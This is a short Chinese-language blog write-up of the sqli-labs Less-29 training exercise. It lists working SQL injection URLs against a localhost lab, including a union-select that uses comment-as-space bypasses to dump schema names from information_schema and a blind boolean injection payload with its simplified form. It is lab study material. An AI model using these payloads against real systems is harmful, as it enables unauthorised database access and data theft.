[sqli-labs]Less-29(明注 , 替換空格 , Bool盲注)

這道題發(fā)現(xiàn)頁面中會(huì)顯示出GET過去的參數(shù)
不過好像沒有URL解碼...
好奇怪 , 感覺好像是傳過去之后又被編碼了 , 還沒有看源碼 , 暫時(shí)不能確定
這樣的話 , 說明執(zhí)行的SQL語句就是URL編碼以后的 , 這樣肯定是不行的
用Burp抓包重放試試

后記 :
URL編碼過濾了空格等等特殊字符 , 可以通過這樣驗(yàn)證存在注入點(diǎn)

http://127.0.0.1/Less-29/?id=0'union/**/select/**/1,1,1/**/--+
http://127.0.0.1/Less-29/?id=0%27union/**/select/**/1,group_concat(schema_name),1/**/from/**/information_schema.schemata--+
這樣就可以dump數(shù)據(jù)了

后記 :

還是可以利用前面的Payload通殺盲注
http://127.0.0.1/Less-28a/?id=0%27%20or()or%20%27%27=%271

后來發(fā)現(xiàn)這個(gè)Payload還可以簡化
在mysql中也有弱類型機(jī)制 , '0' 和 '1' 可以分別表示假和真
簡化后 :
?id=0'||()||'0
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容